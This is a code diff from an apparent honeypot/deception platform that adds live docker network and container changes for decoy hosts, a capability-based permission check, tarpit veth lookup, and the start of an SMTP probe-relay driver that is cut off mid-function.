 async def _materialise_lan_change(
    repo: Any,
    topology_id: str,
    *,
    created: Optional[tuple[str, str, bool]] = None,
    removed: Optional[str] = None,
 ) -> None:
    """Create or remove the docker bridge for a live LAN op + re-render compose.
    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
    write lands.  Skips when:
    * the topology is not active/degraded (a pending topology gets its
      networks created at deploy time),
    * the topology is pinned to a swarm agent (cross-host materialisation
      isn't implemented; the agent's apply_topology RPC re-renders the
      whole compose at next push),
    * the docker SDK / networking primitive raises (logged, not
      re-raised — the DB row is the source of truth).
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return
    status = topology.status
    if status not in ("active", "degraded"):
        return
    if topology.target_host_uuid:
        _log.info(
            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
            topology_id,
        )
        return
    # Lazy imports — these pull in docker.py / network.py which both
    # require the docker SDK; keeping them out of module-import keeps
    # the mutator usable in test environments that stub docker.
    import docker
    from decnet.engine.deployer import _topology_compose_path
    from decnet.network import create_bridge_network, remove_bridge_network
    from decnet.topology.compose import _network_name, write_topology_compose
    client = docker.from_env()
    try:
        if created is not None:
            name, subnet, is_dmz = created
            net_name = _network_name(topology_id, name)
            try:
                create_bridge_network(
                    client, net_name, subnet, internal=not is_dmz,
                )
            except Exception as exc:  # noqa: BLE001
                _log.error(
                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
                    topology_id, name, subnet, exc,
                )
                # Don't re-raise — the DB row is the source of truth.
                # Operator can retry by removing + re-adding the LAN.
        if removed is not None:
            net_name = _network_name(topology_id, removed)
            try:
                remove_bridge_network(client, net_name)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
                    topology_id, removed, exc,
                )
        # Re-render compose so the file on disk matches the DB.  Even
        # when the bridge create above failed, a future redeploy will
        # try to bring the network back from the compose definition.
        hydrated = await hydrate(repo, topology_id)
        if hydrated is not None:
            try:
                write_topology_compose(
                    hydrated, _topology_compose_path(topology_id),
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live LAN op: compose re-render failed topology=%s: %s",
                    topology_id, exc,
                )
    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
        _log.error(
            "live LAN materialisation crashed topology=%s: %s",
            topology_id, exc,
        )
 def _is_buildx_wedge(exc: BaseException) -> bool:
    """True when *exc* looks like the buildx EROFS wedge.
    We consult both the structured CalledProcessError.stderr and the
    str(exc) form because ``_compose_with_retry`` raises a synthetic
    CalledProcessError whose ``stderr`` contains the recovery hint
    (which preserves the wedge signatures verbatim).
    """
    from decnet.engine.deployer import (
        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
    )
    stderr = ""
    if hasattr(exc, "stderr") and exc.stderr:
        stderr = str(exc.stderr)
    haystack = (stderr + " " + str(exc)).lower()
    return (
        _BUILDX_WEDGE_SIGNATURE in haystack
        and _BUILDX_EROFS_SIGNATURE in haystack
    )
 async def _compose_up_with_buildkit_fallback(
    *args: str, compose_file, label: str,
 ) -> None:
    """Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
    The buildx activity dir occasionally lands on a read-only mount —
    happens enough on operator dev boxes that we don't want a single
    wedge to abort a live decky-add.  When _compose_with_retry raises
    with the EROFS-wedge signatures, we retry once with
    ``DOCKER_BUILDKIT=0`` set.  The legacy (non-buildx) builder doesn't
    use the activity dir and isn't affected.
    *label* is a human-readable identifier used only in log lines so an
    operator can grep the fall-back back to the originating op.
    """
    import anyio
    from decnet.engine.deployer import _compose_with_retry
    try:
        await anyio.to_thread.run_sync(
            lambda: _compose_with_retry(*args, compose_file=compose_file),
        )
        return
    except Exception as exc:  # noqa: BLE001
        if not _is_buildx_wedge(exc):
            raise
        _log.warning(
            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
            "(legacy builder).  Recover the buildx state at your leisure: "
            "rm -rf ~/.docker/buildx/activity && "
            "docker buildx create --name decnet-builder --use --bootstrap",
            label,
        )
    # Outside the except so the second attempt's traceback isn't
    # nested under the first failure if it also blows up.
    await anyio.to_thread.run_sync(
        lambda: _compose_with_retry(
            *args, compose_file=compose_file,
            env={"DOCKER_BUILDKIT": "0"},
        ),
    )
 def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """Compose service names for one decky: base + each per-decky service.
    Skips ``fleet_singleton`` services — those run once fleet-wide and
    don't have a per-decky compose entry.  Mirrors the same filter
    applied at compose-render time
    (:mod:`decnet.topology.compose.generate_topology_compose`).
    """
    from decnet.services.registry import get_service
    targets = [decky_name]
    for svc_name in services:
        try:
            svc = get_service(svc_name)
        except KeyError:
            # Unknown service — leave it; the compose render won't emit
            # a fragment for it, so compose up will simply ignore the
            # name with a clear "no such service" error.  Surface that
            # rather than silently dropping it.
            targets.append(f"{decky_name}-{svc_name}")
            continue
        if svc.fleet_singleton:
            continue
        targets.append(f"{decky_name}-{svc_name}")
    return targets
 async def _live_topology_or_none(
    repo: Any, topology_id: str,
 ) -> Optional[dict[str, Any]]:
    """Return the topology row only when it's eligible for live materialisation.
    Returns None (so callers can skip with a single ``if`` check) when:
    * the topology doesn't exist;
    * status is not ``active`` or ``degraded`` (pending topologies get
      everything materialised at deploy time);
    * the topology is pinned to a swarm agent (cross-host live editing
      is its own routing workstream).
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return None
    if topology.status not in ("active", "degraded"):
        return None
    if topology.target_host_uuid:
        _log.info(
            "live decky op skipped (agent-pinned topology=%s); "
            "next agent push will reconcile",
            topology_id,
        )
        return None
    return topology
 async def _rerender_compose(repo: Any, topology_id: str) -> None:
    """Re-render the per-topology compose file from the current DB.
    Called after each materialisation step so the file on disk matches
    the topology rows.  Soft-fails: a render error is logged but
    doesn't poison the DB-side mutation.
    """
    from decnet.engine.deployer import _topology_compose_path
    from decnet.topology.compose import write_topology_compose
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        return
    try:
        write_topology_compose(hydrated, _topology_compose_path(topology_id))
    except Exception as exc:  # noqa: BLE001
        _log.warning(
            "live op: compose re-render failed topology=%s: %s",
            topology_id, exc,
        )
 async def _materialise_decky_spawn(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
 ) -> bool:
    """compose up -d --no-deps --build for one decky (base + services).
    Re-renders compose first so the file lists the new decky.  Returns
    True when compose-up reported success, False otherwise (or when
    the topology isn't eligible for live materialisation — pending
    topologies skip and return False so the caller doesn't flip the
    state to ``running`` based on a no-op).  Best-effort: docker
    failure is logged, not re-raised — DB row is the source of truth.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return False
    from decnet.engine.deployer import _topology_compose_path
    await _rerender_compose(repo, topology_id)
    targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)
    try:
        await _compose_up_with_buildkit_fallback(
            "up", "-d", "--no-deps", "--build", *targets,
            compose_file=compose_path,
            label=f"live add_decky topology={topology_id} decky={decky_name}",
        )
        return True
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live add_decky: compose up failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
        return False
 async def _materialise_decky_remove(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
 ) -> None:
    """compose stop + rm -f for one decky's containers, then re-render."""
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path
    targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)
    # Stop + rm BEFORE re-rendering compose; the re-rendered file no
    # longer mentions the decky, so a stop run AFTER rendering would
    # find no service to act on.
    try:
        await anyio.to_thread.run_sync(
            lambda: _compose("stop", *targets, compose_file=compose_path),
        )
    except Exception as exc:  # noqa: BLE001
        _log.warning(
            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
    try:
        await anyio.to_thread.run_sync(
            lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
        )
    except Exception as exc:  # noqa: BLE001
        _log.warning(
            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
    await _rerender_compose(repo, topology_id)
 async def _materialise_decky_connect(
    repo: Any, topology_id: str,
    decky_name: str, lan_name: str, ipv4_address: str,
 ) -> None:
    """SDK ``network.connect`` to multi-home a running base container.
    Service containers share the base's netns via ``network_mode:
    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
    the base alone gives every service container the new interface for
    free — we don't need to iterate.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import docker
    from decnet.topology.compose import _container_name, _network_name
    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.connect(container, ipv4_address=ipv4_address)
    except docker.errors.APIError as exc:
        # Idempotency — already on the network is fine.
        msg = str(exc).lower()
        if "already" in msg or "endpoint" in msg and "exists" in msg:
            _log.info(
                "live attach_decky: %s already on network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    await _rerender_compose(repo, topology_id)
 async def _materialise_decky_disconnect(
    repo: Any, topology_id: str, decky_name: str, lan_name: str,
 ) -> None:
    """SDK ``network.disconnect`` to drop a multi-home edge."""
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import docker
    from decnet.topology.compose import _container_name, _network_name
    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.disconnect(container)
    except docker.errors.APIError as exc:
        msg = str(exc).lower()
        if "not connected" in msg or "no such" in msg:
            _log.info(
                "live detach_decky: %s already off network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    await _rerender_compose(repo, topology_id)
 async def _materialise_decky_services_diff(
    repo: Any, topology_id: str,
    decky_name: str,
    added: list[str],
    removed: list[str],
 ) -> None:
    """Add/remove per-service containers without touching siblings.
    Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
    without coupling the mutator to that module — service mutations
    routed via the mutator queue publish ``mutation.applied`` while the
    direct API publishes ``decky.<name>.service_added``; they share
    machinery, not control flow.
    """
    if not added and not removed:
        return
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path
    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)
    add_targets = _decky_targets(decky_name, list(added))[1:]  # drop the base
    if add_targets:
        try:
            await _compose_up_with_buildkit_fallback(
                "up", "-d", "--no-deps", "--build", *add_targets,
                compose_file=compose_path,
                label=f"live update_decky add topology={topology_id} decky={decky_name}",
            )
        except Exception as exc:  # noqa: BLE001
            _log.error(
                "live update_decky add: compose up failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )
    rm_targets = _decky_targets(decky_name, list(removed))[1:]
    for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
        if not rm_targets:
            break
        try:
            await anyio.to_thread.run_sync(
                lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
            )
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live update_decky %s failed topology=%s decky=%s: %s",
                action_name, topology_id, decky_name, exc,
            )
 async def _materialise_decky_recreate_base(
    repo: Any, topology_id: str, decky_name: str,
 ) -> None:
    """Force-recreate just the base container (used for forwards_l3 flips).
    DESTRUCTIVE: kills any in-container state on the base.  Service
    containers re-attach via ``network_mode: service:<base>`` after the
    base is rebuilt.  Caller is responsible for gating this on an
    explicit operator-supplied ``force=true`` flag.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import anyio
    from decnet.engine.deployer import (
        _compose_with_retry, _topology_compose_path,
    )
    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)
    try:
        await anyio.to_thread.run_sync(
            lambda: _compose_with_retry(
                "up", "-d", "--no-deps", "--force-recreate", decky_name,
                compose_file=compose_path,
            ),
        )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live update_decky recreate_base failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
 # ------------------------------------------------------------------- ops
@@ -131,6 +588,16 @@ async def apply_add_lan(
            "y": payload.get("y"),
        }
    )
    # Live materialisation: when the topology is active/degraded, create
    # the docker bridge network now and re-render the per-topology
    # compose file so subsequent ``apply_add_decky`` writes a coherent
    # services map.  Pending topologies skip this — the next deploy
    # creates everything from scratch.  Agent-pinned topologies also
    # skip; live editing on agents is its own routing problem.
    await _materialise_lan_change(
        repo, topology_id, created=(name, subnet, is_dmz),
    )
    await _assert_valid_after(repo, topology_id)
@@ -150,7 +617,17 @@ async def apply_remove_lan(
                f"LAN {lan['name']!r} is the home LAN of decky "
                f"{d['decky_config']['name']!r}; remove the decky first"
            )
-    await repo.delete_lan(lan["id"])
+    lan_name = lan["name"]
    # enforce_pending=False: the mutator queue is the live-editing
    # surface, gated on topology status by us before we got here.  The
    # repo's pending-only guard is for HTTP CRUD callers that mustn't
    # bypass it.
    await repo.delete_lan(lan["id"], enforce_pending=False)
    # Live materialisation symmetric to apply_add_lan: tear down the
    # docker bridge and re-render compose so a future redeploy doesn't
    # try to wire deckies into a network that no longer exists.
    await _materialise_lan_change(repo, topology_id, removed=lan_name)
    await _assert_valid_after(repo, topology_id)
@@ -204,11 +681,12 @@ async def apply_add_decky(
    if forwards_l3:
        decky_config["forwards_l3"] = True
    services_list = list(payload.get("services", []))
    decky_uuid = await repo.add_topology_decky(
        {
            "topology_id": topology_id,
            "name": name,
-            "services": list(payload.get("services", [])),
+            "services": services_list,
            "decky_config": decky_config,
            "x": payload.get("x"),
            "y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
            "forwards_l3": forwards_l3,
        }
    )
    # Live materialisation: spawn the new decky's containers without
    # touching siblings.  Skips on pending / agent-pinned topologies —
    # see _live_topology_or_none.
    spawned = await _materialise_decky_spawn(
        repo, topology_id, name, services_list,
    )
    # Flip the row's state to 'running' on success so the dashboard's
    # ACTIVE DECKIES count reflects reality.  Without this the row
    # stays at the default 'pending' forever; the deployer's full
    # post-deploy reconcile only runs on a fresh deploy_topology.
    if spawned:
        try:
            await repo.update_topology_decky(decky_uuid, {"state": "running"})
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live add_decky: state flip to running failed "
                "topology=%s decky=%s: %s",
                topology_id, name, exc,
            )
    await _assert_valid_after(repo, topology_id)
@@ -286,6 +783,16 @@ async def apply_attach_decky(
            "forwards_l3": forwards_l3,
        }
    )
    # Live materialisation: SDK network.connect on the base container.
    # Service containers share the base's netns via network_mode:
    # service:<base>, so they inherit the new interface — only the base
    # needs the connect.
    await _materialise_decky_connect(
        repo, topology_id,
        decky_name=decky["decky_config"]["name"],
        lan_name=lan["name"],
        ipv4_address=ip,
    )
    await _assert_valid_after(repo, topology_id)
@@ -329,7 +836,15 @@ async def apply_detach_decky(
    await repo.update_topology_decky(
        decky["uuid"], {"decky_config": new_cfg}
    )
-    await repo.delete_topology_edge(edge["id"])
+    await repo.delete_topology_edge(edge["id"], enforce_pending=False)
    # Live materialisation: SDK network.disconnect on the base
    # container.  Service containers automatically lose visibility into
    # the LAN because they share the base's netns.
    await _materialise_decky_disconnect(
        repo, topology_id,
        decky_name=decky["decky_config"]["name"],
        lan_name=lan["name"],
    )
    await _assert_valid_after(repo, topology_id)
@@ -340,7 +855,15 @@ async def apply_remove_decky(
    decky = _decky_by_name(hydrated, payload["decky"])
    if decky is None:
        raise MutationError(f"decky {payload['decky']!r} not found")
-    await repo.delete_topology_decky(decky["uuid"])
+    decky_name = decky["decky_config"]["name"]
    services_list = list(decky.get("services") or [])
    await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
    # Live materialisation: stop + rm -f the decky's containers.  We
    # capture decky_name + services BEFORE the delete so the helper
    # has the targets even though the row is gone.
    await _materialise_decky_remove(
        repo, topology_id, decky_name, services_list,
    )
    await _assert_valid_after(repo, topology_id)
@@ -354,31 +877,136 @@ async def apply_update_decky(
        ``patch``         — dict merged into existing ``decky_config``.
        ``services``      — replacement top-level services list.
        ``x``,``y``       — layout coords.
        ``force``         — opt-in for destructive recreates (currently
                            required when ``forwards_l3`` flips on a
                            live topology — see below).
    Live materialisation strategy:
    * **services changed** → diff old vs new; ``compose up -d`` for
      added, ``compose stop`` + ``rm -f`` for removed.  Mirrors the
      direct API path (services_live) without coupling.
    * **forwards_l3 flipped** → port publishing changes, which docker
      can only apply at container-create time.  Requires recreating
      the base — destructive (kills in-container state, drops active
      sessions).  Gated on ``payload['force'] is True``; otherwise we
      raise ``MutationError`` so a half-thinking operator doesn't
      stomp a live decky.
    * **only coords (x/y)** → DB-only.  No docker work.
    """
    hydrated = await _hydrated(repo, topology_id)
    decky = _decky_by_name(hydrated, payload["decky"])
    if decky is None:
        raise MutationError(f"decky {payload['decky']!r} not found")
    # Capture pre-state so we can compute the diff after the DB write.
    old_services = list(decky.get("services") or [])
    old_cfg = decky.get("decky_config") or {}
    old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
    patch: dict[str, Any] = {}
    new_decky_config = old_cfg
    if payload.get("patch"):
-        merged = dict(decky["decky_config"])
+        new_decky_config = {**old_cfg, **payload["patch"]}
-        merged.update(payload["patch"])
+        patch["decky_config"] = new_decky_config
-        patch["decky_config"] = merged
+    new_services = old_services
    if "services" in payload:
-        patch["services"] = list(payload["services"])
+        new_services = list(payload["services"])
        patch["services"] = new_services
    for key in ("x", "y"):
        if key in payload:
            patch[key] = payload[key]
    if not patch:
        return
    new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
    forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
    # Promotion path: refuse to flip a non-DMZ decky to gateway.  The
    # 'gateway' semantic specifically means 'host-port publisher facing
    # the DMZ' — running it on an internal LAN publishes ports the
    # outside world can't reach and shadows the host's port space.
    # Generic L3-bridge forwards_l3 (internal multi-homing) is set by
    # the generator/attach paths, not by this op, so this check only
    # fires when the operator explicitly toggles the flag.
    if forwards_l3_flipped and new_forwards_l3:
        # Re-derive the home LAN from the edges; same logic as
        # check_gateway_homed_in_dmz.
        decky_uuid = decky["uuid"]
        home_lan_id: Optional[str] = None
        for e in hydrated["edges"]:
            if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
                home_lan_id = e["lan_id"]
                break
        if home_lan_id is None:
            for e in hydrated["edges"]:
                if e["decky_uuid"] == decky_uuid:
                    home_lan_id = e["lan_id"]
                    break
        home_lan = next(
            (lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
            None,
        )
        if home_lan is None or not home_lan.get("is_dmz"):
            home_name = home_lan["name"] if home_lan else "(unknown)"
            raise MutationError(
                f"cannot promote decky {decky['decky_config']['name']!r} "
                f"to gateway: home LAN {home_name!r} is not a DMZ. "
                "Move the decky to the DMZ first, or pick a different decky."
            )
    # Pre-check the destructive flip BEFORE any DB write, so a refused
    # mutation leaves zero side-effects.
    is_live = (await _live_topology_or_none(repo, topology_id)) is not None
    if is_live and forwards_l3_flipped and not bool(payload.get("force")):
        raise MutationError(
            f"forwards_l3 flip on live decky "
            f"{decky['decky_config']['name']!r} requires force=true; "
            "this will recreate the base container and drop in-container state"
        )
    await repo.update_topology_decky(decky["uuid"], patch)
    # Materialisation — only when the topology is actually live.
    # _live_topology_or_none was already called above; calling the
    # individual helpers re-checks (cheap) so they stay self-contained.
    decky_name = decky["decky_config"]["name"]
    added = sorted(set(new_services) - set(old_services))
    removed = sorted(set(old_services) - set(new_services))
    if added or removed:
        await _materialise_decky_services_diff(
            repo, topology_id, decky_name, added, removed,
        )
    if forwards_l3_flipped:
        # force was checked above; reaching here means the operator
        # opted in.  recreate_base re-renders compose first so the
        # rebuilt base picks up the new `ports:` block.
        await _materialise_decky_recreate_base(
            repo, topology_id, decky_name,
        )
    await _assert_valid_after(repo, topology_id)
 async def apply_update_lan(
    repo: Any, topology_id: str, payload: dict[str, Any]
 ) -> None:
-    """Update LAN fields — subnet, is_dmz, coords, rename."""
+    """Update LAN fields — subnet, is_dmz, coords, rename.
    Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
    Live deckies bind to the bridge with IPs allocated from the old
    subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
    flag, which docker can't change on a network with active
    containers).  Reject those mutations on active/degraded topologies
    rather than rewriting the DB into an incoherent state.
    Coord-only updates (``x``/``y``) are layout-only; let them through
    unconditionally.  Renames pass through too — the bridge's docker
    name is keyed off ``_network_name(topology_id, lan_name)``, so a
    rename would also need a rebuild — but rename isn't currently a
    code path on active topologies; if the operator hits it we still
    write the row and let the next deploy reconcile.
    """
    hydrated = await _hydrated(repo, topology_id)
    lan = _lan_by_name(hydrated, payload["name"])
    if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
            fields[key] = payload[key]
    if not fields:
        return
    topology = await repo.get_topology(topology_id)
    is_live = bool(topology) and topology.status in ("active", "degraded")
    if is_live:
        hostile = {"subnet", "is_dmz"} & fields.keys()
        if hostile:
            raise MutationError(
                f"cannot change {sorted(hostile)} on a deployed LAN; "
                f"teardown + redeploy required"
            )
    await repo.update_lan(lan["id"], fields)
    await _assert_valid_after(repo, topology_id)
--- a/decnet/network.py
+++ b/decnet/network.py
@@ -151,11 +151,20 @@ def _ensure_network(
        options.update(extra_options)
    for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
        # networks.list() doesn't populate Containers — reload to get the
        # full inspect payload (including connected container IDs).
        try:
            net.reload()
        except docker.errors.APIError:
            pass
        if net.attrs.get("Driver") == driver:
            # Same driver — but if the IPAM pool drifted (different subnet,
            # gateway, or ip-range than this deploy asks for), reusing it
            # hands out addresses from the old pool and we race the real LAN.
-            # Compare and rebuild on mismatch.
+            # Compare and rebuild on mismatch — but only when no containers
            # are attached. With active endpoints Docker refuses the remove
            # with 403; just attach to the existing network instead.
            pools = (net.attrs.get("IPAM") or {}).get("Config") or []
            cur = pools[0] if pools else {}
            if (
@@ -164,8 +173,15 @@ def _ensure_network(
                and cur.get("IPRange") == ip_range
            ):
                return  # right driver AND matching pool, leave it alone
-        # Driver mismatch OR IPAM drift — tear it down. Disconnect any live
+            if net.attrs.get("Containers"):
-        # containers first so `remove()` doesn't refuse with ErrNetworkInUse.
+                # Active endpoints — can't safely rebuild. Attach to the
                # existing network; IPAM drift on ip_range only affects
                # Docker's auto-assign pool, which DECNET doesn't use
                # (IPs are always set explicitly in the compose file).
                return
        # Driver mismatch OR empty-endpoint IPAM drift — tear it down.
        # Disconnect any live containers first so `remove()` doesn't
        # refuse with ErrNetworkInUse.
        for cid in (net.attrs.get("Containers") or {}):
            try:
                net.disconnect(cid, force=True)
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
 # Host-side macvlan interface (hairpin fix)
 # ---------------------------------------------------------------------------
-def _require_root() -> None:
+# Linux capability bit positions — see capabilities(7).
-    if os.geteuid() != 0:
+_CAP_NET_ADMIN = 12
-        raise PermissionError(
+
-            "MACVLAN host-side interface setup requires root. Run with sudo."
+
-        )
+def _has_cap_net_admin() -> bool:
    """True if the current process holds CAP_NET_ADMIN in its effective set.
    Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
    don't need a libcap dependency.  ``CapEff`` is a 64-bit hex bitmask;
    bit 12 is CAP_NET_ADMIN.
    """
    try:
        with open("/proc/self/status", "r") as fh:
            for line in fh:
                if line.startswith("CapEff:"):
                    bits = int(line.split()[1], 16)
                    return bool(bits & (1 << _CAP_NET_ADMIN))
    except OSError:
        pass
    return False
 def _require_net_admin() -> None:
    """Reject early if the process can't run ``ip link add ... macvlan``.
    CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
    of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
    but not necessary.  Prefer the cap check so the systemd unit's
    ``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
    whole API to run as root.
    """
    if os.geteuid() == 0 or _has_cap_net_admin():
        return
    raise PermissionError(
        "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
        "Either run as root or grant the cap (systemd: "
        "AmbientCapabilities=CAP_NET_ADMIN)."
    )
 def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
    host-helper first: the two drivers can share a parent NIC on paper but
    leaving the opposite helper in place is just cruft after a driver swap.
    """
-    _require_root()
+    _require_net_admin()
    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
 def teardown_host_macvlan(decky_ip_range: str) -> None:
-    _require_root()
+    _require_net_admin()
    _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
    host-helper first so a prior macvlan deploy doesn't leave its slave
    dangling on the parent NIC after the driver swap.
    """
-    _require_root()
+    _require_net_admin()
    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
 def teardown_host_ipvlan(decky_ip_range: str) -> None:
-    _require_root()
+    _require_net_admin()
    _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
        strict=False,
    )
    return str(network)
 # ---------------------------------------------------------------------------
 # Container veth resolution (for tc netem tarpit)
 # ---------------------------------------------------------------------------
 def get_container_pid(container_name: str) -> int:
    """Return the PID of a running container's init process."""
    client = docker.from_env()
    try:
        container = client.containers.get(container_name)
    except docker.errors.NotFound:
        raise LookupError(f"container {container_name!r} not found")
    pid = container.attrs["State"]["Pid"]
    if not pid:
        raise LookupError(f"container {container_name!r} is not running (PID=0)")
    return pid
 def get_container_veth(container_name: str) -> str:
    """Return the host veth interface name paired to container_name's eth0.
    Reads /sys/class/net/eth0/iflink from inside the container to get the
    peer interface index, then matches it against ``ip link show`` on the host.
    Requires no nsenter and no elevated privileges beyond what Docker exec grants.
    """
    result = _run(
        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
        check=False,
    )
    if result.returncode != 0:
        raise LookupError(
            f"container {container_name!r} not reachable: {result.stderr.strip()}"
        )
    peer_index = result.stdout.strip()
    links = _run(["ip", "link", "show"])
    for line in links.stdout.splitlines():
        if line.startswith(f"{peer_index}:"):
            # Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
            iface = line.split(":")[1].strip().split("@")[0]
            return iface
    raise LookupError(
        f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
    )
--- a/decnet/orchestrator/drivers/init.py
+++ b/decnet/orchestrator/drivers/init.py
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
    try:
        from decnet.orchestrator.emailgen.scheduler import EmailAction
    except ImportError:  # pragma: no cover - scheduler always exists
-        EmailAction = None  # type: ignore[assignment]
+        EmailAction = None  # type: ignore[assignment, misc]
    if EmailAction is not None and isinstance(action, EmailAction):
        from decnet.orchestrator.drivers.email import EmailDriver
        return EmailDriver()
--- a/decnet/orchestrator/drivers/email.py
+++ b/decnet/orchestrator/drivers/email.py
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
        """Convenience accessor for telemetry / logging."""
        return self._llm.model
-    async def run(self, action: EmailAction) -> ActivityResult:
+    async def run(self, action: EmailAction) -> ActivityResult:  # type: ignore[override]
        return await self._run_email(action)
    async def _run_email(self, action: EmailAction) -> ActivityResult:
--- a/decnet/orchestrator/drivers/smtp_relay.py
+++ b/decnet/orchestrator/drivers/smtp_relay.py
@@ -0,0 +1,80 @@
 """SMTP probe-relay driver.
 Forwards the attacker's first probe email via the master's real internet
 connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
 the master (where this worker runs) does.
 Called by the realism worker's smtp probe listener, not the main tick loop.
 """
 from __future__ import annotations
 import email
 import smtplib
 from pathlib import Path
 from typing import Any
 _ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
 def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
    """Return body with a From: header added if one is absent."""
    try:
        msg = email.message_from_bytes(body)
    except Exception:
        return body
    if msg["From"]:
        return body
    # Prepend the header before the existing content.
    header_line = f"From: {mail_from}\r\n".encode()
    return header_line + body
 def forward_probe(
    *,
    svc_cfg: dict[str, Any],
    stored_as: str,
    decky_name: str,
    mail_from: str,
    rcpt_to: list[str],
